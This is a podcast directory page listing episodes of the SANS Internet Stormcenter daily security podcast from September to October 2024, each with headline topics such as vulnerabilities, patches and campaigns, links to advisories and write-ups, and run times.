Winamp Logo
SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast) Cover
SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast) Profile

SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

English, Computing/Technology, 1 season, 4116 episodes, 5 days, 4 hours, 6 minutes
About
A brief daily summary of what is important in cyber security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually about 5 minute long, summary of current network security related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Stormcenter. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .
Episode Artwork

ISC StormCast for Thursday, October 24th, 2024

Everybody Loves Bash Scripts Including Attackers https://isc.sans.edu/diary/Everybody%20Loves%20Bash%20Scripts.%20Including%20Attackers./31376 Fortimanager Exploited Vulnerability https://www.fortiguard.com/psirt/FG-IR-24-423 Sharepoint Exploit https://www.cisa.gov/news-events/alerts/2024/10/22/cisa-adds-one-known-exploited-vulnerability-catalog https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC OpenSSL Vulnerability https://openssl-library.org/news/secadv/20241016.txt Reduced Certificate Lifetime https://github.com/cabforum/servercert/pull/553
10/24/20246 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, October 23rd, 2024

How much HTTP (not HTTPS) Traffic is Traversing Your Perimeter? https://isc.sans.edu/diary/How%20much%20HTTP%20%28not%20HTTPS%29%20Traffic%20is%20Traversing%20Your%20Perimeter%3F/31372 VMSA-2024-0019:VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 Unifi Security Advisory Bulletin 043 https://community.ui.com/releases/Security-Advisory-Bulletin-043-043/28e45c75-314e-4f07-a4f3-d17f67bd53f7 Fake attachment. Roundcube mail server attacks exploit CVE-2024-37383 vulnerability. https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/fake-attachment-roundcube-mail-server-attacks-exploit-cve-2024-37383-vulnerability Atlassian Security Bulletin - October 15 2024 https://confluence.atlassian.com/security/security-bulletin-october-15-2024-1442910972.html OneDev Arbitrary file reading for unauthenticated user https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489
10/23/20245 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, October 22nd, 2024

A Network Nerd's Take on Emergency Preparedness https://isc.sans.edu/diary/A%20Network%20Nerd%27s%20Take%20on%20Emergency%20Preparedness/31356 HM Surf Vulnerability Access to Camera Exploited CVE-2024-44133 https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/ Fortinet releases patches for undisclosed critical FortiManager vulnerability https://www.helpnetsecurity.com/2024/10/21/fortimanager-critical-vulnerability/ ScienceLogic Vulnerability https://rackspace.service-now.com/system_status?id=detailed_status&service=4dafca5a87f41610568b206f8bbb35a6 https://docs.sciencelogic.com/latest/Content/Web_Admin_and_Accounts/System_Administration/sys_admin_system_upgrade.htm
10/22/20246 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, October 21st, 2024

Microsoft 365: Partially incomplete log data due to monitoring agent issue https://m365admin.handsontek.net/multiple-services-partially-incomplete-log-data-due-to-monitoring-agent-issue/ End-to-End Encrytped Cloud Storage in the Wild: A Broken Ecosystem https://brokencloudstorage.info/paper.pdf ESET Branded Malware https://x.com/ESETresearch/status/1847192384448172387 Synology Update https://www.synology.com/en-us/security/advisory/Synology_SA_24_17 Spring Framework Update CVe-2024-38819 CVE-2024-38820 https://spring.io/blog/2024/10/17/spring-framework-cve-2024-38819-and-cve-2024-38820-published Grafana Security Release CVE-2024-9264 https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/
10/21/20245 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, October 18th, 2024

Scanning Activity from Subnet 15.184.0.0/16. https://isc.sans.edu/diary/Scanning%20Activity%20from%20Subnet%2015.184.0.0%2016/31362 Gatekeeper Bypass /unit42.paloaltonetworks.com/gatekeeper-bypass-macos/ Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2024.html Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ata19x-multi-RDTEqRsy SAP Vulnerability https://redrays.io/blog/poc-sap-note-3433192-code-injection-vulnerability-in-sap-netweaver-as-java/ Dept. of Commerce Sites Advertising Medication https://x.com/tliston/status/1833542884047654984
10/18/20245 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, October 17th, 2024

The Top 10 Not So Common SSH Usernames and Passwords https://isc.sans.edu/diary/The%20Top%2010%20Not%20So%20Common%20SSH%20Usernames%20and%20Passwords/31360 CISA Product Security Bad Practices https://www.cisa.gov/resources-tools/resources/product-security-bad-practices Kubernetes Image Builder Vulnerability CVE-2024-9486 CVE-2024-9594 https://discuss.kubernetes.io/t/security-advisory-cve-2024-9486-and-cve-2024-9594-vm-images-built-with-kubernetes-image-builder-use-default-credentials/30119 Solarwinds Hardcoded Password Exploited CVE-2024-28987 https://www.bleepingcomputer.com/news/security/solarwinds-web-help-desk-flaw-is-now-exploited-in-attacks/ Bypassing noexec and executing arbitrary binaries https://iq.thc.org/bypassing-noexec-and-executing-arbitrary-binaries Workshop Website: https://www.sansapi.com/ https://www.sansapi.com/docs
10/17/20245 minutes, 38 seconds
Episode Artwork

ISC StormCast for Wednesday, October 16th, 2024

Angular-base64-upload Demo Script Exploited https://isc.sans.edu/diary/Angular-base64-upload%20Demo%20Script%20Exploited%20%28CVE-2024-42640%29/31354 Quantum Annealing Public Key Cryptographic Attack Algorithm Based on D-Wave Advantage http://cjc.ict.ac.cn/online/onlinepaper/wc-202458160402.pdf EDRSilencer https://github.com/netero1010/EDRSilencer Synchronizing Passkeys https://fidoalliance.org/specifications-credential-exchange-specifications/
10/16/20246 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, October 15th, 2024

Phishing Page Delivered Through a Blob URL https://isc.sans.edu/diary/Phishing%20Page%20Delivered%20Through%20a%20%20Blob%20URL/31350 Fortinet Fortigate CVE 2024-23113 deep dive https://labs.watchtowr.com/fortinet-fortigate-cve-2024-23113-a-super-complex-vulnerability-in-a-super-secure-appliance-in-2024/ This New Supply Chain Attack Technique Can Trojanize All Your CLI Commands https://checkmarx.com/blog/this-new-supply-chain-attack-technique-can-trojanize-all-your-cli-commands/
10/15/20245 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, October 14th, 2024

Windows PPTP and L2TP Deprecation https://techcommunity.microsoft.com/t5/windows-server-news-and-best/pptp-and-l2tp-deprecation-a-new-era-of-secure-connectivity/ba-p/4263956 BIG-IP LTM Systems Unencrypted Cookie Exploitation https://www.cisa.gov/news-events/alerts/2024/10/10/best-practices-configure-big-ip-ltm-systems-encrypt-http-persistence-cookies https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/ https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/
10/14/20245 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, October 11th, 2024

GPTHoney: A new class of honeypot https://isc.sans.edu/diary/GPTHoney%3A%20A%20new%20class%20of%20honeypot%20%5BGuest%20Diary%5D/31342 Palo Alto Expedition: From N-Day to Full Compromise https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/ Firefox 0-Day https://www.mozilla.org/en-US/security/advisories/mfsa2024-51/ GitLab Vulnerabilities Patched https://securityonline.info/cve-2024-9164-cvss-9-6-gitlab-users-urged-to-update-now/
10/11/20245 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, October 10th, 2024

From Perfctl to InfoStealer https://isc.sans.edu/diary/From%20Perfctl%20to%20InfoStealer/31334 Wazuh Abused by Miner Campaign https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/ USB Sticks Still Bridge Airgaps https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/ Fortigate Vulnerability now being exploited https://nvd.nist.gov/vuln/detail/CVE-2024-23113
10/10/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, October 9th, 2024

Microsoft Patch Tuesday - October 2024 https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20-%20October%202024/31336 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html The Disappearance of an Internet Domain https://every.to/p/the-disappearance-of-an-internet-domain
10/9/20246 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, October 8th, 2024

macOS Sequoia: System/Network Admins, Hold On! https://isc.sans.edu/diary/macOS%20Sequoia%3A%20System%20Network%20Admins%2C%20Hold%20On!/31330 Cisco Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv34x-privesc-rce-qE33TCms Apple iTunes PoC https://github.com/mbog14/CVE-2024-44193 Attackers used ISP's Wiretap System to Spy on Users https://www.wsj.com/politics/national-security/china-cyberattack-internet-providers-260bd835 https://www.bleepingcomputer.com/news/security/atandt-verizon-reportedly-hacked-to-target-us-govt-wiretapping-platform/
10/8/20245 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, October 7th, 2024

Survey of CUPS exploit URLs https://isc.sans.edu/diary/Survey%20of%20CUPS%20exploit%20attempts/31326 Exposed LDAP Servers https://www.usenix.org/conference/usenixsecurity24/presentation/kaspereit Exploiting Visual Studio via Dump Files https://ynwarcs.github.io/exploiting-vs-dump-files Apple Security Updates https://support.apple.com/en-us/100100 Free API Security Workshop https://www.sans.org/webcasts/aviata-solo-flight-challenge-cloud-security-workshop-chapter-7/
10/7/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, October 4th, 2024

Kickstart Your DShield Honeypot https://isc.sans.edu/diary/Kickstart%20Your%20DShield%20Honeypot%20%5BGuest%20Diary%5D/31320 CreanaKeeper Use of Cloud Services https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/ Pixel Addressing Vulnerabilities in Cellular Modems https://security.googleblog.com/2024/10/pixel-proactive-security-cellular-modems.html Optigo Spectra Vulnerabilities https://claroty.com/team82/disclosure-dashboard/cve-2024-41925 https://claroty.com/team82/disclosure-dashboard/cve-2024-45367
10/4/20245 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, October 3rd, 2024

Security Related Docker Containers https://isc.sans.edu/diary/Security%20related%20Docker%20containers/31318 CUPS DDoS Attack https://www.akamai.com/blog/security-research/october-cups-ddos-threat Draytek Vulnerabilities https://www.forescout.com/resources/draybreak-draytek-research/ SANS Munich (free Community Night Tuesday October 15th) https://www.sans.org/cyber-security-training-events/munich-october-2024/
10/3/20246 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, October 2nd, 2024

Hurricane Helene Aftermath - Cyber Security Awareness Month https://isc.sans.edu/diary/Hurricane%20Helene%20Aftermath%20-%20Cyber%20Security%20Awareness%20Month/31314 Zimbra - Remote Command Execution (CVE-2024-45519) https://blog.projectdiscovery.io/zimbra-remote-code-execution/ Enhancing the security of Microsoft Edge extensions with the new Publish API https://blogs.windows.com/msedgedev/2024/09/30/enhanced-security-for-extensions-with-new-publish-api/ CVE-2024-36435 Deep-Dive: The Year s Most Critical BMC Security Flaw https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw
10/2/20245 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, October 1st, 2024

Tool Update: mac-robber.py, le-hex-to-ip.py https://isc.sans.edu/diary/Tool%20update%3A%20mac-robber.py%20and%20le-hex-to-ip.py/31310 Ransomware Attacks Expanding to Hybrid Cloud Environments https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/ Update on Recall Security and Privacy Architecture https://blogs.windows.com/windowsexperience/2024/09/27/update-on-recall-security-and-privacy-architecture/ Detecting Ransomware in Windows Event Logs https://blogs.jpcert.or.jp/en/2024/09/windows.html Progress WhatsUp Gold Update https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-September-2024?popup=true&overview Singapore Class https://jbu.me/singapore
10/1/20246 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, September 30th, 2024

CUPS Vulnerability https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302 PHP Updates https://www.php.net/ChangeLog-8.php#8.1.30 DNS And Big Chinese Firewall https://www.assetnote.io/resources/research/insecurity-through-censorship-vulnerabilities-caused-by-the-great-firewall https://isc.sans.edu/diary/Are+You+Piratebay+thepiratebayorg+Resolving+to+Various+Hosts/19175 HPE Aruba Networking Vulnerabilities https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04712en_us&docLocale=en_US
9/30/20247 minutes
Episode Artwork

ISC StormCast for Friday, September 27th, 2024

Patch for Critical CUPS vulnerability: Don't Panic https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302
9/27/20246 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, September 26th, 2024

DNS Reflection Update and Corrupted DNS Requests https://isc.sans.edu/diary/DNS%20Reflection%20Update%20and%20Odd%20Corrupted%20DNS%20Requests/31296 CVE-2024-28987 Solarwinds Web Help Desk Hardcoded Credentials Vulnerability https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/ cve-2024-28987 Watchguard Unauthenticated and Unencrypted SSO Protocol https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-006/ https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2024-00014 Infostealers Overcome Chrome's App Bound Encryption https://securityonline.info/infostealers-overcome-chromes-app-bound-encryption-threatening-user-data-security/
9/26/20247 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, September 26th, 2024

DNS Reflection Update and Corrupted DNS Requests https://isc.sans.edu/diary/DNS%20Reflection%20Update%20and%20Odd%20Corrupted%20DNS%20Requests/31296 CVE-2024-28987 Solarwinds Web Help Desk Hardcoded Credentials Vulnerability https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/ cve-2024-28987 Watchguard Unauthenticated and Unencrypted SSO Protocol https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-006/ https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2024-00014 Infostealers Overcome Chrome's App Bound Encryption https://securityonline.info/infostealers-overcome-chromes-app-bound-encryption-threatening-user-data-security/
9/26/20247 minutes, 1 second
Episode Artwork

ISC StormCast for Wednesday, September 25th, 2024

Exploitation of RAISECOM Gateway Devices CVE-2024-7120 https://isc.sans.edu/diary/Exploitation%20of%20RAISECOM%20Gateway%20Devices%20Vulnerability%20CVE-2024-7120/31292 Cellopoint Vulnerability CVE-2024-9043 https://www.twcert.org.tw/en/cp-139-8103-b0568-2.html Cisco Smart Licensing Vulnerability Details https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html Ivanti Virtual Traffic Manager Exploited https://www.cisa.gov/known-exploited-vulnerabilities-catalog GNU Linux Systems Possible Critical Vulnerability https://securityonline.info/severe-unauthenticated-rce-flaw-cvss-9-9-in-gnu-linux-systems-awaiting-full-disclosure/
9/25/20245 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, September 25th, 2024

Exploitation of RAISECOM Gateway Devices CVE-2024-7120 https://isc.sans.edu/diary/Exploitation%20of%20RAISECOM%20Gateway%20Devices%20Vulnerability%20CVE-2024-7120/31292 Cellopoint Vulnerability CVE-2024-9043 https://www.twcert.org.tw/en/cp-139-8103-b0568-2.html Cisco Smart Licensing Vulnerability Details https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html Ivanti Virtual Traffic Manager Exploited https://www.cisa.gov/known-exploited-vulnerabilities-catalog GNU Linux Systems Possible Critical Vulnerability https://securityonline.info/severe-unauthenticated-rce-flaw-cvss-9-9-in-gnu-linux-systems-awaiting-full-disclosure/
9/25/20245 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, September 24th, 2024

Phishing Links With @ Sign https://isc.sans.edu/diary/Phishing%20links%20with%20%40%20sign%20and%20the%20need%20for%20effective%20security%20awareness%20building/31288 Kaspersky Deletes Itself Installs UltraAV Antivirus Without Warning https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/ Microchip ASF tinydhcp Vulnerability https://kb.cert.org/vuls/id/138043
9/24/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, September 24th, 2024

Phishing Links With @ Sign https://isc.sans.edu/diary/Phishing%20links%20with%20%40%20sign%20and%20the%20need%20for%20effective%20security%20awareness%20building/31288 Kaspersky Deletes Itself Installs UltraAV Antivirus Without Warning https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/ Microchip ASF tinydhcp Vulnerability https://kb.cert.org/vuls/id/138043
9/24/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, September 23rd, 2024

Windows Server Update Services Deprecation https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-server-update-services-wsus-deprecation/ba-p/4250436 Windows Server 2025 Hotpatches https://techcommunity.microsoft.com/t5/windows-server-news-and-best/now-in-preview-hotpatch-for-windows-server-2025/ba-p/4248296 Google Suggests Not Using WHOIS for Certificate Validation https://lists.cabforum.org/pipermail/servercert-wg/2024-September/004821.html Versa Director Vulnerability https://security-portal.versa-networks.com/emailbulletins/66e4a8ebda545d61ec2b1ab9 Apache Hugegraph Vulnerability Exploited https://nvd.nist.gov/vuln/detail/CVE-2024-27348
9/23/20245 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, September 23rd, 2024

Windows Server Update Services Deprecation https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-server-update-services-wsus-deprecation/ba-p/4250436 Windows Server 2025 Hotpatches https://techcommunity.microsoft.com/t5/windows-server-news-and-best/now-in-preview-hotpatch-for-windows-server-2025/ba-p/4248296 Google Suggests Not Using WHOIS for Certificate Validation https://lists.cabforum.org/pipermail/servercert-wg/2024-September/004821.html Versa Director Vulnerability https://security-portal.versa-networks.com/emailbulletins/66e4a8ebda545d61ec2b1ab9 Apache Hugegraph Vulnerability Exploited https://nvd.nist.gov/vuln/detail/CVE-2024-27348
9/23/20245 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, September 20th, 2024

Fake GitHub Site Targeting Developers https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282 Ivanti CSA 4.6 Advisory https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US German Police Deanonymizes Tor User https://blog.torproject.org/tor-is-still-safe/ Ever wonder how crooks get the credentials to unlock stolen phones? https://arstechnica.com/security/2024/09/cops-bust-website-crooks-used-to-unlock-1-2-million-stolen-mobile-phones/
9/20/20247 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, September 20th, 2024

Fake GitHub Site Targeting Developers https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282 Ivanti CSA 4.6 Advisory https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US German Police Deanonymizes Tor User https://blog.torproject.org/tor-is-still-safe/ Ever wonder how crooks get the credentials to unlock stolen phones? https://arstechnica.com/security/2024/09/cops-bust-website-crooks-used-to-unlock-1-2-million-stolen-mobile-phones/
9/20/20247 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, September 19th, 2024

Python Infostealer Patching Windows Exodus App https://isc.sans.edu/diary/Python%20Infostealer%20Patching%20Windows%20Exodus%20App/31276 Service Now Knoledge Bases Data Exposures https://appomni.com/ao-labs/servicenow-knowledge-bases-data-exposures-uncovered/ Gitlab Patch https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/ Aruba Patch https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04709en_us&docLocale=en_US
9/19/20244 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, September 19th, 2024

Python Infostealer Patching Windows Exodus App https://isc.sans.edu/diary/Python%20Infostealer%20Patching%20Windows%20Exodus%20App/31276 Service Now Knoledge Bases Data Exposures https://appomni.com/ao-labs/servicenow-knowledge-bases-data-exposures-uncovered/ Gitlab Patch https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/ Aruba Patch https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04709en_us&docLocale=en_US
9/19/20244 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, September 18th, 2024

23:59, Time to Exfiltrate! https://isc.sans.edu/diary/23%3A59%2C%20Time%20to%20Exfiltrate!/31272 Critical VMWare VCenter Vulnerability https://blogs.vmware.com/cloud-foundation/2024/09/17/vmsa-2024-0019-questions-answers/ Zero-Click Calendar invite - Critical zero-click vulnerability chain in macOS https://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b Google Adds Latest Post Quantum Encryption Standard to Chrome https://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html
9/18/20245 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, September 18th, 2024

23:59, Time to Exfiltrate! https://isc.sans.edu/diary/23%3A59%2C%20Time%20to%20Exfiltrate!/31272 Critical VMWare VCenter Vulnerability https://blogs.vmware.com/cloud-foundation/2024/09/17/vmsa-2024-0019-questions-answers/ Zero-Click Calendar invite - Critical zero-click vulnerability chain in macOS https://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b Google Adds Latest Post Quantum Encryption Standard to Chrome https://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html
9/18/20245 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, September 17th, 2024

Managing PE Files with Overlays https://isc.sans.edu/forums/diary/Managing%20PE%20Files%20With%20Overlays/31268/ Apple Updates https://support.apple.com/en-us/100100 Ivanti EOL Cloud Service Appliances https://www.cisa.gov/news-events/alerts/2024/09/13/ivanti-releases-security-update-cloud-services-appliance Microsoft Revises September Update https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43461 DLink Vulnerabilities https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html https://www.twcert.org.tw/en/cp-139-8091-bcd52-2.html https://www.twcert.org.tw/en/cp-139-8089-32df6-2.html
9/17/20245 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, September 17th, 2024

Managing PE Files with Overlays https://isc.sans.edu/forums/diary/Managing%20PE%20Files%20With%20Overlays/31268/ Apple Updates https://support.apple.com/en-us/100100 Ivanti EOL Cloud Service Appliances https://www.cisa.gov/news-events/alerts/2024/09/13/ivanti-releases-security-update-cloud-services-appliance Microsoft Revises September Update https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43461 DLink Vulnerabilities https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html https://www.twcert.org.tw/en/cp-139-8091-bcd52-2.html https://www.twcert.org.tw/en/cp-139-8089-32df6-2.html
9/17/20245 minutes, 14 seconds
Episode Artwork

ISC StormCast for Monday, September 16th, 2024

Finding Honeypot Clusters Using DBSCAN https://isc.sans.edu/diary/Finding%20Honeypot%20Data%20Clusters%20Using%20DBSCAN%3A%20Part%202/31194 Auto IT Credential Flusher https://research.openanalysis.net/credflusher/kiosk/stealer/stealc/amadey/autoit/2024/09/11/cred-flusher.html Ivanti Patches https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29847-deep-dive-ivanti-endpoint-manager-agentportal-deserialization-of-untrusted-data-remote-code-execution-vulnerability/ File Sender Vulnerability https://filesender.org/vulnerability-in-filesender-versions-below-2-49-and-3-x-beta/ Docker Patches https://docs.docker.com/desktop/release-notes/#4342
9/16/20246 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, September 16th, 2024

Finding Honeypot Clusters Using DBSCAN https://isc.sans.edu/diary/Finding%20Honeypot%20Data%20Clusters%20Using%20DBSCAN%3A%20Part%202/31194 Auto IT Credential Flusher https://research.openanalysis.net/credflusher/kiosk/stealer/stealc/amadey/autoit/2024/09/11/cred-flusher.html Ivanti Patches https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29847-deep-dive-ivanti-endpoint-manager-agentportal-deserialization-of-untrusted-data-remote-code-execution-vulnerability/ File Sender Vulnerability https://filesender.org/vulnerability-in-filesender-versions-below-2-49-and-3-x-beta/ Docker Patches https://docs.docker.com/desktop/release-notes/#4342
9/16/20246 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, September 13th, 2024

Compromise of old hostname .mobi whois server https://labs.watchtowr.com/we-spent-20-to-achieve-rce-and-accidentally-became-the-admins-of-mobi/ Microsoft Reconsidering Security Tool API https://blogs.windows.com/windowsexperience/2024/09/12/taking-steps-that-drive-resiliency-and-security-for-windows-customers/ Microsoft implents PQC in SymCrypt https://techcommunity.microsoft.com/t5/security-compliance-and-identity/microsoft-s-quantum-resistant-cryptography-is-here/ba-p/4238780 GitLab Patch https://about.gitlab.com/releases/2024/09/11/patch-release-gitlab-17-3-2-released/#execute-environment-stop-actions-as-the-owner-of-the-stop-action-job
9/13/20245 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, September 13th, 2024

Compromise of old hostname .mobi whois server https://labs.watchtowr.com/we-spent-20-to-achieve-rce-and-accidentally-became-the-admins-of-mobi/ Microsoft Reconsidering Security Tool API https://blogs.windows.com/windowsexperience/2024/09/12/taking-steps-that-drive-resiliency-and-security-for-windows-customers/ Microsoft implents PQC in SymCrypt https://techcommunity.microsoft.com/t5/security-compliance-and-identity/microsoft-s-quantum-resistant-cryptography-is-here/ba-p/4238780 GitLab Patch https://about.gitlab.com/releases/2024/09/11/patch-release-gitlab-17-3-2-released/#execute-environment-stop-actions-as-the-owner-of-the-stop-action-job
9/13/20245 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, September 11th, 2024

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20September%202024%20Patch%20Tuesday/31254 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Ivanti Patches https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022?language=en_US
9/11/20246 minutes
Episode Artwork

ISC StormCast for Wednesday, September 11th, 2024

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20September%202024%20Patch%20Tuesday/31254 Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Ivanti Patches https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022?language=en_US
9/11/20246 minutes
Episode Artwork

ISC StormCast for Tuesday, September 10th, 2024

Critical Loadmaster Security Vulnerability https://support.kemptechnologies.com/hc/en-us/articles/29196371689613-LoadMaster-Security-Vulnerability-CVE-2024-7591 HA Proxy Patch https://www.mail-archive.com/haproxy%40formilux.org/msg45280.html Akira Ransomware Campaign Targeting Sonicwall SSLVPN Accounts https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/ Kibana Deserializatio Vulnerability https://discuss.elastic.co/t/kibana-8-15-1-security-update-esa-2024-27-esa-2024-28/366119 Stately Taurus Abuses VSCode https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/
9/10/20244 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, September 10th, 2024

Critical Loadmaster Security Vulnerability https://support.kemptechnologies.com/hc/en-us/articles/29196371689613-LoadMaster-Security-Vulnerability-CVE-2024-7591 HA Proxy Patch https://www.mail-archive.com/haproxy%40formilux.org/msg45280.html Akira Ransomware Campaign Targeting Sonicwall SSLVPN Accounts https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/ Kibana Deserializatio Vulnerability https://discuss.elastic.co/t/kibana-8-15-1-security-update-esa-2024-27-esa-2024-28/366119 Stately Taurus Abuses VSCode https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/
9/10/20244 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, September 9th, 2024

Password Cracking Energy: More Details https://isc.sans.edu/diary/Password%20Cracking%20%26%20Energy%3A%20More%20Dedails/31242 Python Notpad ++ https://isc.sans.edu/diary/Python%20%26%20Notepad%2B%2B/31240 Fake LinkedIn Job Ads https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/ Android Crypto Passphrase Stealer with OCR https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-android-spyagent-campaign-steals-crypto-credentials-via-image-recognition/ Sextortion Scam Now use Your Chating Spouses Name as a Lure https://www.bleepingcomputer.com/news/security/sextortion-scam-now-use-your-cheating-spouses-name-as-a-lure/
9/9/20246 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, September 9th, 2024

